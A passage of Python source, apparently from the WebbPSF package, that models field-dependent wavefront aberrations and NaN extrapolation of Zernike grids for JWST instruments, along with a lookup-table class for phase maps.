return sig_ans def _calc_blc_wedge(deg=4, wavelength=2.1e-6): """ This function determines the desired sigma coefficients required to achieve a wedge from 2 to 6 lam/D. It returns the coefficients of a polynomial fit that maps from nlambda/D to sigma. """ import scipy r = np.linspace(2, 6, 161) difflim = wavelength / 6.5 * 180. * 60 * 60 / np.pi sigs = [_width_blc(difflim * ri) for ri in r] pcs = scipy.polyfit(r, sigs, deg) p = scipy.poly1d(pcs) plt.plot(r, sigs, 'b') plt.plot(r, p(r), "r--") diffs = (sigs - p(r)) print("Poly fit:" + repr(pcs)) print(" fit rms: " + str(diffs.std())) def _trim_nan_image(xgrid, ygrid, zgrid): """NaN Trimming of Image Remove rows/cols with NaN's while trying to preserve the maximum footprint of real data. """ xgrid2, ygrid2, zgrid2 = xgrid, ygrid, zgrid # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # First, crop all rows/cols that are only NaN's xind_good = np.where(num_nans_cols < nrows)[0] yind_good = np.where(num_nans_rows < ncols)[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Find a optimal rectangule subsection free of NaN's # Iterative cropping ndiff = 5 while np.isnan(zgrid2.sum()): # Make sure ndiff is not negative if ndiff<0: break npix = zgrid2.size # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # Look for any appreciable diff row-to-row/col-to-col col_diff = num_nans_cols - np.roll(num_nans_cols,-1) row_diff = num_nans_rows - np.roll(num_nans_rows,-1) # For edge wrapping, just use last minus previous col_diff[-1] = col_diff[-2] row_diff[-1] = row_diff[-2] # Keep rows/cols composed mostly of real data # and where number of NaN's don't change dramatically xind_good = np.where( ( np.abs(col_diff) <= ndiff ) & ( num_nans_cols < 0.5*nrows ) )[0] yind_good = np.where( ( np.abs(row_diff) <= ndiff ) & ( num_nans_rows < 0.5*ncols ) )[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Check for convergence # If we've converged, reduce if npix==zgrid2.size: ndiff -= 1 # Last ditch effort in case there are still NaNs # If so, remove rows/cols 1 by 1 until no NaNs while np.isnan(zgrid2.sum()): xgrid2 = xgrid2[1:-1] ygrid2 = ygrid2[1:-1] zgrid2 = zgrid2[1:-1,1:-1] return xgrid2, ygrid2, zgrid2 def _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=0): """Fix NaN's in Zernike Grid We trim NaN's within `zgrid`, then generate an extrapolation function using `RegularGridInterpolator`. A rotation angle can also be specified to maximize the number of remaining data points due to irregular polygons of the real `zgrid` data. Returns `zgrid` with the NaN's fixed using the extrapolation function. Parameter ========= xgrid : ndarray 1D V2 regular grid information ygrid : ndarray 1D V3 regular grid information zgrid : ndarray 2D Zernike grid rot_ang : float Option to rotate grid data for more optimal trimming of NaN's. """ # Rotate zgrid if rot_ang != 0: zgrid = rotate(zgrid, rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaN's along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols with NaN's xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs X, Y = np.meshgrid(xgrid,ygrid) pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) # De-rotate clipped zgrid image and redo RegularGridInterpolator if rot_ang != 0: # De-rotate zgrid = rotate(zgrid, -rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaNs along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols 1 by 1 until no NaNs xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) return zgrid def _get_initial_pupil_sampling(instrument): """Utility function to retrieve the sampling of the first plane in some optical system. Returns: npix, pixelscale """ # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case npix = instrument.pupil.shape[0] pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) npix = pupilheader['NAXIS1'] pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel return npix, pixelscale # Field dependent aberration class for JWST instruments class WebbFieldDependentAberration(poppy.OpticalElement): """ Field dependent aberration generated from Zernikes measured in ISIM CV testing Parameters ----------- include_oversize : bool Explicitly model the 4% oversize for pupil tolerance """ def __init__(self, instrument, include_oversize=False, **kwargs): super(WebbFieldDependentAberration, self).__init__( name="Aberrations", **kwargs ) self.instrument = instrument self.instr_name = instrument.name # work out which name to index into the CV results with, if for NIRCam is_nrc_coron = False # Define NRC coronagraph variable for conciseness if instrument.name == 'NIRCam': channel = instrument.channel[0].upper() lookup_name = "NIRCam{channel}W{module}".format( channel=channel, module=instrument.module ) # Check for coronagraphy; Set is_ncr_coron to True for Lyot pupil mask pupil_mask = self.instrument._pupil_mask is_nrc_coron = (pupil_mask is not None) and ( ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper()) ) elif instrument.name == 'FGS': # 'GUIDER1' or 'GUIDER2' assert instrument.detector in ('FGS1', 'FGS2') lookup_name = 'Guider' + instrument.detector[3] else: lookup_name = instrument.name _log.debug("Retrieving Zernike coefficients for " + lookup_name) self.tel_coords = instrument._tel_coords() # load the Zernikes table here zfile = "si_zernikes_isim_cv3.fits" # Check special case NIRCam coronagraphy if is_nrc_coron: zfile = "si_zernikes_coron_wfe.fits" zernike_file = os.path.join(utils.get_webbpsf_data_path(), zfile) if not os.path.exists(zernike_file): raise RuntimeError("Could not find Zernike coefficients file {} \ in WebbPSF data directory".format(zfile)) else: self.ztable_full = Table.read(zernike_file) npix, self.pixelscale = _get_initial_pupil_sampling(self.instrument) self.ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name] # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value v2 = self.ztable['V2'] v3 = self.ztable['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # Save closest ISIM CV3 WFE measured field point for reference self.row = self.ztable[closest] self.name = "{instrument} internal WFE at V2V3=({v2:.2f},{v3:.2f})', near {field_point}".format( instrument=lookup_name, field_point=self.row['field_point_name'], v2=telcoords_am[0], v3=telcoords_am[1] ) self.si_wfe_type = ("Interpolated", "SI WFE was interpolated between available meas.") # Retrieve those Zernike coeffs # Field point interpolation v2_tel, v3_tel = telcoords_am coeffs = [] for i in range(1, 37): zkey = 'Zernike_{}'.format(i) zvals = self.ztable[zkey] # Cubic interpolation of of non-uniform 2D grid cf = griddata((v2, v3), zvals, (v2_tel, v3_tel), method='cubic').tolist() # Want to perform extrapolation if field point outside of bounds if np.isnan(cf): if i==1: self.si_wfe_type = ("Extrapolated", "SI WFE was extrapolated outside available meas.") # To extrapolate outside the measured field points, we proceed # in two steps. This first creates a fine-meshed cubic fit # over the known field points, fixes any NaN's using # RegularGridInterpolator, then again uses RegularGridInterpolator # on the fixed data to extrapolate the requested field point. # In principle, the first call of RegularGridInterpolator can be # used to extrapolate the requested field point to eliminate # the intermediate step, but this method enables use of all the # real data rather than the trimmed data set. RGI is a rather # quick process, so added overheads should be negligible. # Full field V2/V3 limits for each instrument. # Produces better initial extrapolation with fewer # interpolation artifacts in RGI. if lookup_name == 'Guider1': v2_min, v2_max, v3_min, v3_max = (2.2, 4.7, -12.9, -10.4) elif lookup_name == 'Guider2': v2_min, v2_max, v3_min, v3_max = (-0.8, 1.6, -12.9, -10.4) elif lookup_name == 'NIRISS': v2_min, v2_max, v3_min, v3_max = (-6.0, -3.6, -12.9, -10.4) elif lookup_name == 'MIRI': v2_min, v2_max, v3_min, v3_max = (-8.3, -6.1, -7.3, -5.2) elif lookup_name == 'NIRSpec': v2_min, v2_max, v3_min, v3_max = (3.7, 9.0, -9.8, -4.5) elif (lookup_name == 'NIRCamLWA') or (lookup_name == 'NIRCamSWA'): v2_min, v2_max, v3_min, v3_max = (0.2, 2.7, -9.5, -7.0) elif (lookup_name == 'NIRCamLWB') or (lookup_name == 'NIRCamSWB'): v2_min, v2_max, v3_min, v3_max = (-2.7, -0.2, -9.5, -7.0) else: v2_min, v2_max, v3_min, v3_max = (v2.min(), v2.max(), v3.min(), v3.max()) # For NIRCam coronagraphy, add 50" to V3 limits if is_nrc_coron: v3_min += 50. / 60. v3_max += 50. / 60. # Create fine mesh grid dstep = 1. / 60. # 1" steps xgrid = np.arange(v2_min, v2_max+dstep, dstep) ygrid = np.arange(v3_min, v3_max+dstep, dstep) X, Y = np.meshgrid(xgrid,ygrid) # Cubic interpolation of all points # Will produce a number of NaN's that need to be extrapolated over zgrid = griddata((v2, v3), zvals, (X, Y), method='cubic') # Want to rotate zgrid image of some SIs to minimize NaN clipping if 'NIRSpec' in lookup_name: rot_ang = 43 elif 'MIRI' in lookup_name: rot_ang = -5 elif 'NIRISS' in lookup_name: rot_ang = 2 else: rot_ang = 0 # Fix the NaN's within zgrid array # Perform specified rotation for certain SIs # Trim rows/cols zgrid = _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=rot_ang) # Create final function for extrapolation func = RegularGridInterpolator((ygrid,xgrid), zgrid, method='linear', bounds_error=False, fill_value=None) # Extrapolate at requested (V2,V3) coordinates cf = func( (v3_tel, v2_tel) ).tolist() coeffs.append(cf) self.zernike_coeffs = coeffs # Generate an OPD on the same sampling as the input wavefront - # but implicitly inverted in coordinate system # to match the OTE exit pupil orientation if include_oversize: # Try to model the oversized gaps around the internal pupils. # This is only relevant if you are trying to model pupil shear or rotations, # and in general we don't have good WFE data outside the nominal pupil anyway # so let's leave this detail off by default. # internal pupils for NIRISS and MIRI instruments are 4 percent # oversized tricontagons if self.instrument.name == "NIRISS": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'tricontagon_oversized_4pct.fits.gz') ) # cut out central region to match the OPD, which is hard coded # to 1024 self.amplitude = self.amplitude[256:256 + 1024, 256:256 + 1024] elif self.instrument.name == "MIRI": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'MIRI', 'optics', 'MIRI_tricontagon_oversized_rotated.fits.gz') ) else: # internal pupil is a 4 percent oversized circumscribing circle? # For NIRCam: # John stansberry 2016-09-07 reports "It is definitely oversized, but isn't really # circular... Kinda vaguely 6-sided I guess. [...] I can dig up # a drawing and/or some images that show the pupil stop." y, x = np.indices((npix, npix), dtype=float) y -= (npix - 1) / 2.0 x -= (npix - 1) / 2.0 r = np.sqrt(y ** 2 + x ** 2) self.amplitude = (r < (npix - 1) / 2.0 * 1.04).astype(int) self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, aperture=self.amplitude, outside=0 ) else: self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, outside=0 ) self.amplitude = (self.opd != 0).astype(int) def header_keywords(self): """ Return info we would like to save in FITS header of output PSFs """ from collections import OrderedDict keywords = OrderedDict() keywords['SIWFETYP'] = self.si_wfe_type keywords['SIWFEFPT'] = (self.row['field_point_name'], "Closest ISIM CV3 WFE meas. field point") for i in range(1, 36): keywords['SIZERN{}'.format(i)] = (self.zernike_coeffs[i - 1], "[m] SI WFE coeff for Zernike term {}".format(i)) return keywords # wrapper just to change default vmax def display(self, *args, **kwargs): if 'opd_vmax' not in kwargs: kwargs.update({'opd_vmax': 2.5e-7}) return super(WebbFieldDependentAberration, self).display(*args, **kwargs) class NIRSpecFieldDependentAberration(WebbFieldDependentAberration): """ Subclass that adds to the above the division into fore-optics and spectrograph optics for NIRSpec. The available end-to-end optical test data for NIRSpec from ISIM CV3 do not allow distinguishing which optical planes have which amounts of aberration. However, the NIRSpec team performed extensive metrology during the assembly of NIRSpec FM2, both of individual components and of the assembled system using a shack hartmann WFS temporarily placed within the optical system. [should add document number here to the report with those data!] Based on those data, Maurice Te Plate recommended to Marshall Perrin that the CV3 WFE should be apportioned 1/3 to the fore-optics and 2/3 to the spectrograph optics (collimator & camera). Given the uncertainties and available data that seems sufficiently precise for current purposes. """ def __init__(self, instrument, where='fore', **kwargs): super(NIRSpecFieldDependentAberration, self).__init__(instrument, **kwargs) if where == 'fore': self.name = 'NIRSpec fore-optics WFE, near {}'.format(self.row['field_point_name']) self.scalefactor = 1. / 3 else: self.name = 'NIRSpec spectrograph WFE, near {}'.format(self.row['field_point_name']) self.scalefactor = 2. / 3 # apply scale factor to split up the OPD, and that's all we need to do. self.opd *= self.scalefactor class NIRCamFieldAndWavelengthDependentAberration(WebbFieldDependentAberration): """ Subclass that adds to the above the wavelength dependent variation in defocus for NIRCam. The model for this is based on NIRCam models and ISIM CV2 test data, as provided by Randal Telfer to Marshall Perrin. It uses a combination of model design predictions continuously at all wavelengths based on the properties of the glasses in the refractive optical design, plus some small tweaks to achieve better agreement with the CV test measurements of defocus at a small subset of wavelengths. """ def __init__(self, instrument, **kwargs): super( NIRCamFieldAndWavelengthDependentAberration, self).__init__( instrument, **kwargs) # Polynomial equations fit to defocus model. Wavelength-dependent focus # results should correspond to Zernike coefficients in meters. # Fits were performed to the SW and LW optical design focus model # as provided by Randal Telfer. # See plot at https://github.com/spacetelescope/webbpsf/issues/179 # The relative wavelength dependence of these focus models are very # similar for coronagraphic mode in the Zemax optical prescription, # so we opt to use the same focus model in both imaging and coronagraphy. defocus_to_rmswfe = -1.09746e7 # convert from mm defocus to meters (WFE) sw_focus_cf = np.array([-5.169185169, 50.62919436, -201.5444129, 415.9031962, -465.9818413, 265.843112, -59.64330811]) / defocus_to_rmswfe lw_focus_cf = np.array([0.175718713, -1.100964635, 0.986462016, 1.641692934]) / defocus_to_rmswfe self.fm_short = np.poly1d(sw_focus_cf) self.fm_long = np.poly1d(lw_focus_cf) # Coronagraphic tilt (`ctilt`) offset model # Primarily effects the LW channel (approximately a 0.031mm diff from 3.5um to 5.0um). # SW module is small compared to LW, but we include it for completeness. # Values have been determined using the Zernike offsets as reported in the # NIRCam Zemax models. The center reference positions will correspond to the # NIRCam target acquisition filters (3.35um for LW and 2.1um for SW) sw_ctilt_cf = np.array([125.849834, -289.018704]) / 1e9 lw_ctilt_cf = np.array([146.827501, -2000.965222, 8385.546158, -11101.658322]) / 1e9 self.ctilt_short = np.poly1d(sw_ctilt_cf) self.ctilt_long = np.poly1d(lw_ctilt_cf) # Get the representation of focus in the same Zernike basis as used for # making the OPD. While it looks like this does more work here than needed # by making a whole basis set, in fact because of caching behind the scenes # this is actually quick basis = poppy.zernike.zernike_basis_faster( nterms=len(self.zernike_coeffs), npix=self.opd.shape[0], outside=0 ) self.defocus_zern = basis[3] self.tilt_zern = basis[2] def get_opd(self, wave): """ Parameters ---------- wave : float or obj either a scalar wavelength (meters) or a Wavefront object """ if isinstance(wave, poppy.Wavefront): wavelength = wave.wavelength else: wave = poppy.Wavefront(wavelength=float(wave)) wavelength = wave.wavelength # Check for coronagraphy pupil_mask = self.instrument._pupil_mask is_nrc_coron = (pupil_mask is not None) and ( ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper()) ) # Which wavelength was used to generate the OPD map we have already # created from zernikes? if self.instrument.channel.upper() == 'SHORT': focusmodel = self.fm_short opd_ref_wave = 2.12 opd_ref_focus = focusmodel(opd_ref_wave) else: focusmodel = self.fm_long opd_ref_wave = 3.23 # All LW WFE measurements were made using F323N, # which has it's own focus that deviates from focusmodel(). # But only do this for direct imaging SI WFE values, # because coronagraph WFE was measured in Zemax (no additional focus power). if is_nrc_coron: opd_ref_focus = focusmodel(opd_ref_wave) else: opd_ref_focus = 1.206e-7 # Not coronagraphy (e.g., imaging) # If F323N or F212N, then no focus offset necessary wave_um = wavelength.to(units.micron).value if ('F323N' in self.instrument.filter) or ('F212N' in self.instrument.filter): deltafocus = 0 else: deltafocus = focusmodel(wave_um) - opd_ref_focus _log.info(" Applying OPD focus adjustment based on NIRCam focus vs wavelength model") _log.info(" Modified focus from {} to {} um: {:.3f} nm wfe".format( opd_ref_wave, wave_um, -deltafocus * 1e9) ) # Apply defocus mod_opd = self.opd - deltafocus * self.defocus_zern # Apply wavelength-dependent tilt offset for coronagraphy # We want the reference wavelength to be that of the target acq filter # Final offset will position TA ref wave at the OPD ref wave location # (wave_um - opd_ref_wave) - (ta_ref_wave - opd_ref_wave) = wave_um - ta_ref_wave if is_nrc_coron: if self.instrument.channel.upper() == 'SHORT': ctilt_model = self.ctilt_short ta_ref_wave = 2.10 else: ctilt_model = self.ctilt_long ta_ref_wave = 3.35 tilt_offset = ctilt_model(wave_um) - ctilt_model(ta_ref_wave) _log.info(" Applying OPD tilt adjustment based on NIRCam tilt vs wavelength model") _log.info(" Modified tilt from {} to {} um: {:.3f} nm wfe".format( ta_ref_wave, wave_um, tilt_offset * 1e9) ) # Apply tilt offset mod_opd = mod_opd + tilt_offset * self.tilt_zern rms = np.sqrt((mod_opd[mod_opd != 0] ** 2).mean()) _log.info(" Resulting OPD has {:.3f} nm rms".format(rms * 1e9)) return mod_opd class MIRIFieldDependentAberrationAndObscuration(WebbFieldDependentAberration): """ Subclass that adds to the above the field dependent obscuration from the MIRI internal calibration source pickoff mirror. The model for this was derived by Randal Telfer based on the optical model file OTE_MIRI_20150223.seq, provided by Scott Rohrbach. In this case we do turn on by default the tricontagon outline since we have to worry about pupil shape anyway. """ def __init__(self, instrument, include_oversize=True, **kwargs): super(MIRIFieldDependentAberrationAndObscuration, self).__init__( instrument, include_oversize=include_oversize, **kwargs ) # figure out the XAN, YAN coordinates in degrees, # since that is what Randal's linear model expects xanyan = instrument._xan_yan_coords().to(units.degree) xan = xanyan[0].value yan = xanyan[1].value # Telfer: # Here is the matrix that reproduces the projection of the # obscuration on the primary mirror, V2-V3 coordinates and # radius in mm, as a function of XAN,YAN in degrees. # So, V2 is: # # V2 = -20882.636 * XAN -680.661 * YAN - 1451.682. # # XAN YAN Const # V2 -20882.636 -680.661 -1451.682 # V3 815.955 26395.552 -2414.406 # Rad 176.864 -392.545 626.920 # we implement the above here, and convert the outputs to meters: self.obsc_v2 = (-20882.636 * xan - 680.661 * yan - 1451.682) * 0.001 self.obsc_v3 = (815.955 * xan + 26395.552 * yan - 2414.406) * 0.001 self.obsc_r = (176.864 * xan - 392.545 * yan + 626.920) * 0.001 # generate coordinates. N.B. this assumed hard-coded pixel scale and # array size. pixel_scale = constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 y, x = poppy.Wavefront.pupil_coordinates((1024, 1024), pixel_scale) # Now, the v2 and v3 coordinates calculated above are as projected back to # the OTE entrance pupil # But the OTE exit pupil as seen at the MIRI internal pupil is rotated by # 5 degrees with respect to that, and flipped in handedness as well # (but only in V3, given webbpsf axes conventions relative to the definition of the V frame) # Therefore we must transform the v2 and v3 to match the wavefront coords at the # intermediate plane. angle = np.deg2rad(instrument._rotation) proj_v2 = np.cos(angle) * self.obsc_v2 - np.sin(angle) * self.obsc_v3 proj_v3 = -np.sin(angle) * self.obsc_v2 + np.cos(angle) * self.obsc_v3 # handle V3 flip from OTE entrance to exit pupils # no flip needed for V2 since that's already implicitly done between # the V frame looking "in" to the OTE vs WebbPSF simulations looking # "out" from the detector toward the sky. proj_v3 *= -1 mask = np.sqrt((y - proj_v3) ** 2 + (x - proj_v2) ** 2) < self.obsc_r self.amplitude[mask] = 0 # No need to subclass any of the methods; it's sufficient to set the custom # amplitude mask attribute value. # Alternative implementation that just reads OPDs from some file class LookupTableFieldDependentAberration(poppy.OpticalElement): """ Retrieve OPDs from a lookup table over many field points. This is pretty much a hack, hard-coded for a specific data delivery from Ball! Intended for OTE team WFR4 and MIMF KDP Practice data prep, not generalized beyond that. Parameters ----------- add_niriss_defocus: bool add 0.8 microns PTV defocus to NIRISS only (for WFR4 test) rm_ptt: bool Remove piston, tip, tilt rm_center_ptt : bool If rm_ptt, use the center value for each detector rather than per field point nwaves: float Number of waves to defocus SM, if add_sm_defocus_pos or add_sm_defocus_neg is True. add_sm_defocus: bool If True, add "nwaves" of SM defocus, measured at a reference wavelength of 2.0 microns. Usage: ------ inst = webbpsf.NIRCam() # or any other SI inst._si_wfe_class = LookupTableFieldDependentAberration() """ def __init__(self, instrument, field_points_file=None, phasemap_file=None, which_exercise='MIMF_KDP_2', add_niriss_defocus=None, rm_ptt=None, rm_center_ptt=None, add_mimf_defocus=False, add_sm_defocus=False, nwaves=None, **kwargs): super().__init__( name="Aberrations", **kwargs ) import warnings self.instrument = instrument self.instr_name = instrument.name self.instrument.pupilopd=None # Do not add in the usual telescope WFE on top of this; # This model provided by Ball includes both the telescope and the SI WFE combined. self.rm_ptt = rm_ptt self.which_exercise = which_exercise if self.which_exercise == 'WFR4': add_niriss_defocus=True rm_ptt = True rm_center_ptt = True elif self.which_exercise == 'MIMF_KDP': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'MIMF_KDP_2': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False if self.instr_name =='NIRCam': self.instr_name += " "+self.instrument.module elif self.instr_name == 'FGS': self.instr_name = self.instrument.detector self.tel_coords = instrument._tel_coords() # load the OPD lookup map table (datacube) here import webbpsf.constants if self.which_exercise == 'WFR4': fp_path = '/ifs/jwst/tel/wfr4_mirage_sims/phase_maps_from_ball/' if field_points_file is None: field_points_file = fp_path + 'The_Field_Coordinates.txt' if phasemap_file is None: phasemap_file = fp_path + 'phase_maps.fits' self.phasemap_file = phasemap_file self.table = Table.read(field_points_file, format='ascii', names=('V2', 'V3')) self.yoffset = -7.8 self.table['V3'] += self.yoffset # Correct from -YAN to actual V3 self.phasemaps = fits.getdata(phasemap_file) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER/256 * units.meter / units.pixel resample = True elif self.which_exercise == 'MIMF_KDP': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice/Ball_Phase_Maps/' field_points_file = fp_path + 'coordinates.txt' self.table = Table.read(field_points_file, format='ascii.basic', names=('XWAS', 'YWAS')) # Convert coordinate table to V2V3 in arcminutes self.table['V2'] = -self.table['XWAS'] self.table['V3'] = self.table['YWAS'] - 468/60 phasemap_file = fp_path + 'all_26Feb2021.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': fp_path = '/ifs/jwst/tel/LRE4/from_ball/' if self.which_exercise == 'LRE4': field_points_file = fp_path + 'coordinates.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-25.2.fits' elif self.which_exercise == 'LRE4-OTE26': field_points_file = fp_path + 'coordinates-ote26.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-26.fits' self.table = Table.read(field_points_file) self.phasemaps = fits.getdata(phasemap_file) # Phase maps have been pre-zoomed in this case by the import notebook resample = False self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 * units.meter / units.pixel elif self.which_exercise == 'MIMF_KDP_2': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice_Sept2021/Ball_Phase_Maps/' # Convert coordinate table to V2V3 in arcminutes xcoords = fits.getdata(fp_path+"xcor.fits") ycoords = fits.getdata(fp_path+"ycor.fits") V2 = -xcoords.flatten() V3 = ycoords.flatten() - 468/60 self.table = Table([V2,V3], names=['V2','V3']) phasemap_file = fp_path + 'complete_wf.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True self.phasemap_file = phasemap_file # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case self.pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) self.pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value print(f"Requested field point has coord {telcoords_am}") v2 = self.table['V2'] v3 = self.table['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # if there are two field points with identical coords or equal distance just one is returned print(f"Closest field point is row {closest}:\n{self.table[closest]}") # Save closest ISIM CV3 WFE measured field point for reference self.row = self.table[closest] self.name = "{instrument} at V2V3=({v2:.2f},{v3:.2f}) Lookup table WFE from ({v2t:.2f},{v3t:.2f})".format( instrument=self.instr_name, v2=telcoords_am[0], v3=telcoords_am[1], v2t=self.row['V2'], v3t=self.row['V3'] ) self.si_wfe_type = ("Lookup Table", "SI + OTE WFE from supplied lookup table of phase maps.") # Retrieve the phase map phasemap = self.phasemaps[closest] # The phase maps are provided in OTE entrance pupil orientation, however we need it to be # in exit pupil orientation, so flip it vertically here. phasemap = phasemap[::-1] print("Flipped input phase map vertically into exit pupil orientation.") if resample: if phasemap.shape[0] != 256: raise NotImplementedError("Hard coded for Ball delivery of 256 pixel phase maps") # Resample to 1024 across, by replicating each pixel into a 4x4 block resample_factor = 4 phasemap_big = np.kron(phasemap, np.ones((resample_factor,resample_factor))) else: # no resampling / zooming needed phasemap_big = phasemap self.opd = phasemap_big * 1e-6 # Convert from microns to meters self.amplitude = np.ones_like(self.opd) if rm_ptt: apmask = self.opd != 0 if rm_center_ptt: # Remove the PTT values at the center of each instrument, rather than per field point. This # leaves in the field dependence but takes out the bulk offset # These values are just a precomputed lookup table of the coefficients returned by the # opd_expand_nonorthonormal call just below, for the center field point on each. coeffs_per_si = {"NIRCam A": [-3.50046880e-10, -7.29120639e-08, -1.39751567e-08], "NIRCam B": [-2.45093780e-09, -2.51804001e-07, -2.64821753e-07], "NIRISS": [-1.49297771e-09, -2.11111038e-06, -3.99881993e-07], "FGS1": [ 9.86180620e-09, -5.94041500e-07, 1.18953161e-06], "FGS2": [ 4.84327424e-09, -8.24285481e-07, 5.09791593e-07], "MIRI": [-8.75766849e-09, -1.27850277e-06, -1.03467567e-06],} coeffs = coeffs_per_si[self.instr_name] else: coeffs = poppy.zernike.opd_expand_nonorthonormal(self.opd, aperture=apmask, nterms=3) ptt_only = poppy.zernike.opd_from_zernikes(coeffs, aperture=apmask, npix=self.opd.shape[0], outside=0) self.opd -= ptt_only print(f"Removing piston, tip, tilt from the input wavefront. Coeffs for {self.instr_name}: {coeffs},") if add_mimf_defocus: self.instrument.options['defocus_waves'] = 0.8 self.instrument.options['defocus_wavelength'] = 1e-6 # Add 0.8 microns PTV defocus if add_niriss_defocus and self.instr_name=='NIRISS': # The Ball delivery was supposed to have defocused NIRISS for rehearsal purposes, but didn't. # So fix that here. self.instrument.options['defocus_waves'] = 0.8 self.instrument.options['defocus_wavelength'] = 1e-6 # Add 0.8 microns PTV defocus warnings.warn("Adding defocus=0.8 waves for NIRISS!") if add_sm_defocus: if nwaves: print("ADDING DEFOCUS {:4.1f} WAVES at 2.0 microns".format(nwaves)) self.instrument.options['defocus_waves'] = nwaves self.instrument.options['defocus_wavelength'] = 2.0e-6 else: print("Not adding any defocus; set nwaves") def header_keywords(self): """ Return info we would like to save in FITS header of output PSFs """ from collections import OrderedDict keywords = OrderedDict() keywords['SIWFETYP'] = self.si_wfe_type keywords['SIWFEFPT'] = ( f"{self.row['V2']:.3f}, {self.row['V3']:.3f}", "Closest lookup table meas. field point") keywords['SIWFEFIL'] = self.phasemap_file return keywords # wrapper just to change default vmax def display(self, *args, **kwargs): if 'opd_vmax' not in kwargs: kwargs.update({'opd_vmax': 2.5e-7}) return super().display(*args, **kwargs) class NIRCamFieldDependentWeakLens(poppy.OpticalElement): """Higher-fidelity model of NIRCam weak lens(es), based on calibrated as-built performance and field dependence. Includes field-dependent variations in defocus power, and in astigmatism. Includes variation of the +4 lens' effective OPD when used in a pair with either the +8 or -8 lens. These are modeled as the specific values from the nearest neighbor ISIM CV calibration point, with no interpolation between them included at this time. See R. Telfer, 'NIRCam Weak Lens Characterization and Performance', JWST-REF-046515 Parameters ----------- name : str WLP8, WLM8, WLP4, WLM4, WLP12. center_fp_only : bool For debugging; override to set no field dependence and just use the average center field point power 